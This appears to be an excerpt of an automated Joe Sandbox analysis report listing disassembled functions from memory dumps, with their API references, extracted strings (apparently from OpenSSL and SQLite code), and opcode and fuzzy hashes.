Opcode ID: 1179f49cef2614599ac27385311664bb38b10ace598ec30c3f873f2a9e03a6a8
Instruction ID: 03823c4cc9c91f956aba75e062d08a1db615fe292034d2b97fb0b91663fc008c
Opcode Fuzzy Hash: 1179f49cef2614599ac27385311664bb38b10ace598ec30c3f873f2a9e03a6a8
Instruction Fuzzy Hash: 65F0E861A18B9986E7145B69A54506D73A0EF49FF1B180731EB7A177F4CF3CE485C310

Function 00007FF8A932EC4C Relevance: 1.6, APIs: 1, Instructions: 337COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A932EDA1

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
Instruction ID: f0eea199c81feaa4f10038f3e24fb7ebd0eb46651664c6a123000a19f44e4c09
Opcode Fuzzy Hash: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
Instruction Fuzzy Hash: FF31E532A0EB91AAE7649E25945127D33B5EF64FC4F589435DE08C7685CF3DE842C740

Function 00007FF8A8833F80 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140(?,?,?,00007FF8A88348CF), ref: 00007FF8A8833FED

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID:
API String ID: 3568877910-0
Opcode ID: aa13d94df53dad11d29fd15ccb850683b36ec86aa41e0cb0c7996d899546b7bb
Instruction ID: a9f4872ba3992031bfa811beb8db176b57f5d1fd822b1f8507bb48a0a29c966d
Opcode Fuzzy Hash: aa13d94df53dad11d29fd15ccb850683b36ec86aa41e0cb0c7996d899546b7bb
Instruction Fuzzy Hash: 76219A3260AB4096DB15CF11E4801AEB3A8FF88BC4B844635DB9D03768EF38E251C744

Function 00007FF8B7E55DBC Relevance: 1.5, APIs: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF8B7E55DEC

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 6b627887be14beab393af873e730b8ecaeea971ac98b42c89ec63ae5f2cd1be8
Instruction ID: 7e3f7f8985a71c22b512a9b7177690aca23e2b346d78ec1dc0d3a541cda9a7c5
Opcode Fuzzy Hash: 6b627887be14beab393af873e730b8ecaeea971ac98b42c89ec63ae5f2cd1be8
Instruction Fuzzy Hash: 97E0EDB1B0064982DB289B19D49123963A1EB09FA4F245735DE3D8B3D0CE2CD8E1C340

Function 00007FF8A92D1E01 Relevance: 1.3, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A932EDA1

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
Instruction ID: d4ed2cc819a7e6d8b088ebd5ad0942470a0e97e548115825b46c034ed7f3a786
Opcode Fuzzy Hash: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
Instruction Fuzzy Hash: 68319232A0EA92AAF7749E25944127D72B5EF64BC4F149431DE0DC7685CF3DE882CB80

Function 00007FF8A92DF3F0 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FF8A92DF31B), ref: 00007FF8A92DF421

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
Instruction ID: 5cc671a3634c0df63c7080b87b1e9f1e617ce5b69aad499f1295fd60378b76f1
Opcode Fuzzy Hash: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
Instruction Fuzzy Hash: F6216D3260878097E3589F22A98029AB3A9FB88BD4F544135EB9887F59CF7CE455CB04

Function 00007FF8A92D2054 Relevance: 1.3, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A92DF84B

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: ffd3714810fece18b63243a8f0a43d4e35894e222ddb91346eb91433d1a1336c
Instruction ID: b42c2eb0ed1b93cd6e88812e2192382065935db309c73fecbb563e5cab6bc59e
Opcode Fuzzy Hash: ffd3714810fece18b63243a8f0a43d4e35894e222ddb91346eb91433d1a1336c
Instruction Fuzzy Hash: 31F04F31A1DBD195E3049F16F8402AAA364FB85FC0F188035EE9D87FAACE7CD5418744

Non-executed Functions

Function 00007FF8B7E15750 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 356COMMON

Download Yara Rule

APIs

00007FF8BFAB1E30.VCRUNTIME140 ref: 00007FF8B7E158EB

Strings

email, xrefs: 00007FF8B7E15B5D
IP Address, xrefs: 00007FF8B7E159E2
URI, xrefs: 00007FF8B7E15B4B
failed to allocate BIO, xrefs: 00007FF8B7E157B1
DirName, xrefs: 00007FF8B7E15AFD
<INVALID>, xrefs: 00007FF8B7E1599B
Registered ID, xrefs: 00007FF8B7E1595E
Unknown general name type %d, xrefs: 00007FF8B7E15883
%d.%d.%d.%d, xrefs: 00007FF8B7E15A1E
Invalid value %.200s, xrefs: 00007FF8B7E15C4B
DNS, xrefs: 00007FF8B7E15B54
<invalid>, xrefs: 00007FF8B7E15ADC
%X:%X:%X:%X:%X:%X:%X:%X, xrefs: 00007FF8B7E15AB2

Memory Dump Source

Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true

Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd

Similarity

API ID: 00007
String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
API String ID: 3568877910-4109427827
Opcode ID: 01c2fd40f2c5ea4e9aeed28cc21b31da44747e28ed5f3481235f04e043f187b7
Instruction ID: 05db0a8b2d9064cf9b7930f440ed51bec18af44a1006560aee28395a216c4f22
Opcode Fuzzy Hash: 01c2fd40f2c5ea4e9aeed28cc21b31da44747e28ed5f3481235f04e043f187b7
Instruction Fuzzy Hash: DFF15721A0CB9286EAA5CB2DA85653E67A1BF85FD1F044431CB5E46FB4EF3CE504D710

Function 00007FF8A87FC720 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 403COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87FC844

Strings

max rootpage (%u) disagrees with header (%u), xrefs: 00007FF8A87FC93C
Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u), xrefs: 00007FF8A87FCA38
Page %u: never used, xrefs: 00007FF8A87FCB28
Freelist: , xrefs: 00007FF8A87FC8BA
incremental_vacuum enabled with a max rootpage of zero, xrefs: 00007FF8A87FC960
Page %u: pointer map referenced, xrefs: 00007FF8A87FCB94
Failed to read ptrmap key=%u, xrefs: 00007FF8A87FCA11

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
API String ID: 3568877910-741541785
Opcode ID: 052523f2d31702d875edfec471e5345a8572d438cc203e263a3081f135eacc59
Instruction ID: dd231424ea1a51e78e388b423bde21134e3db0d3fe72ee7d75b33c602866b301
Opcode Fuzzy Hash: 052523f2d31702d875edfec471e5345a8572d438cc203e263a3081f135eacc59
Instruction Fuzzy Hash: 4B02DE32F4A756AAEB14CB26D44427D77A1FB84784F14413ADA4E47B94DFBCE840CB24

Function 00007FF8A87DE980 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 399COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87DE9EB
00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87DEA73

Part of subcall function 00007FF8A87DC090: 00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87DC0F2

Strings

winGetTempname4, xrefs: 00007FF8A87DEF1E
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00007FF8A87DEC93
winGetTempname1, xrefs: 00007FF8A87DEB74
winGetTempname2, xrefs: 00007FF8A87DEAA6
winGetTempname5, xrefs: 00007FF8A87DEC4C
etilqs_, xrefs: 00007FF8A87DE9A2, 00007FF8A87DEC5A

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 3568877910-463513059
Opcode ID: 5706e4366017c66d0b5729bbe7d8a5c60fba8519cf79620487a4e92b633df847
Instruction ID: 3d9437e67bfea21e7ea99a4dbc57e8f09a111b63cfbc03879fd5269d8e06c4e6
Opcode Fuzzy Hash: 5706e4366017c66d0b5729bbe7d8a5c60fba8519cf79620487a4e92b633df847
Instruction Fuzzy Hash: DEE13252B1E3CA67EF0D8B3964151786B90EB557C0F88813ADAAE437D1DF2CB512CE24

Function 00007FF8A8183058 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8A8183074
00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A8183098
RtlCaptureContext.KERNEL32 ref: 00007FF8A81830A1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8A81830BB
RtlVirtualUnwind.KERNEL32 ref: 00007FF8A81830FC
00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A818312F
IsDebuggerPresent.KERNEL32 ref: 00007FF8A8183150
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8A8183171
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8A818317C

Memory Dump Source

Source File: 00000001.00000002.2480153841.00007FF8A8181000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8180000, based on PE: true

Associated: 00000001.00000002.2480032989.00007FF8A8180000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A81E2000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A822E000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8231000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8236000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8293000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8295000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8298000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2481039753.00007FF8A8299000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2481081086.00007FF8A829B000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a8180000_Resource.jbxd

Similarity

API ID: 00007ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3558122275-0
Opcode ID: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
Instruction ID: 85df80f58ed4cfe035ca0c0a8b5aa7ef48562fc9d7e1e19cc51451c888d22a75
Opcode Fuzzy Hash: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
Instruction Fuzzy Hash: BF31827260AB81D6EB618F60E8513ED7364FB84788F48403ADA4E47B95DF3CD648C724

Function 00007FF8A92E7630 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 357COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A92E77BA
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A92E7A3C
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A92E7A74

Strings

..\s\ssl\ssl_ciph.c, xrefs: 00007FF8A92E7AB9, 00007FF8A92E7B26
ssl_cipher_process_rulestr, xrefs: 00007FF8A92E7AB2, 00007FF8A92E7B1A
STRENGTH, xrefs: 00007FF8A92E7A32
SECLEVEL=, xrefs: 00007FF8A92E7A6D

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C6126570
String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
API String ID: 800424832-331183818
Opcode ID: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
Instruction ID: 844558c61d5c0b9ffa7bda531c613e10ad895a1cf3ed75bab24c749c467a6a3e
Opcode Fuzzy Hash: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
Instruction Fuzzy Hash: 6AE19372A0D6C65AF7648E2DA48077A7FE9FB457C4F105035DAADC3698EB3CE8418B00

Function 00007FF8A92D2135 Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8A934ECC0
RtlCaptureContext.KERNEL32 ref: 00007FF8A934ECED
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8A934ED07
RtlVirtualUnwind.KERNEL32 ref: 00007FF8A934ED48
IsDebuggerPresent.KERNEL32 ref: 00007FF8A934ED9C
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8A934EDBD
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8A934EDC8

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
Instruction ID: 0bd23a50453fb659f648ead88f654aeae05f26b8bd79584f015443373e0a7887
Opcode Fuzzy Hash: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
Instruction Fuzzy Hash: 9B315C7661AEC1A9EB608F60E8403ED6370FB84785F445039DA4D87B98DF7CD648C714

Function 00007FF8B7DF4650 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8B7DF466C
RtlCaptureContext.KERNEL32 ref: 00007FF8B7DF4699
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8B7DF46B3
RtlVirtualUnwind.KERNEL32 ref: 00007FF8B7DF46F4
IsDebuggerPresent.KERNEL32 ref: 00007FF8B7DF4748
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8B7DF4769
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8B7DF4774

Memory Dump Source

Source File: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true

Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: aefad75713e1d056a1139f6002177c6d3049d0e50abe61c3b809c78e50a920d8
Instruction ID: d465442f069ef6efe652f72f75a740602705b9fc047541f75584f0ffc71fff10
Opcode Fuzzy Hash: aefad75713e1d056a1139f6002177c6d3049d0e50abe61c3b809c78e50a920d8
Instruction Fuzzy Hash: 77315E72609B8185EB608F64E8807ED7374FB847D4F484539DB8E5BAA8DF38D648C714

Function 00007FF8B7E52BC0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8B7E52BDC
RtlCaptureContext.KERNEL32 ref: 00007FF8B7E52C09
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8B7E52C23
RtlVirtualUnwind.KERNEL32 ref: 00007FF8B7E52C64
IsDebuggerPresent.KERNEL32 ref: 00007FF8B7E52CB8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8B7E52CD9
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8B7E52CE4

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: be945e1872453a46079eb03b3ba9076c6fe97ae394edff2aba9fdbd75b39c04d
Instruction ID: e94b05cc9e1fc97cc009d344b1f3f320277b8605f13c8ae0fab385df4140220b
Opcode Fuzzy Hash: be945e1872453a46079eb03b3ba9076c6fe97ae394edff2aba9fdbd75b39c04d
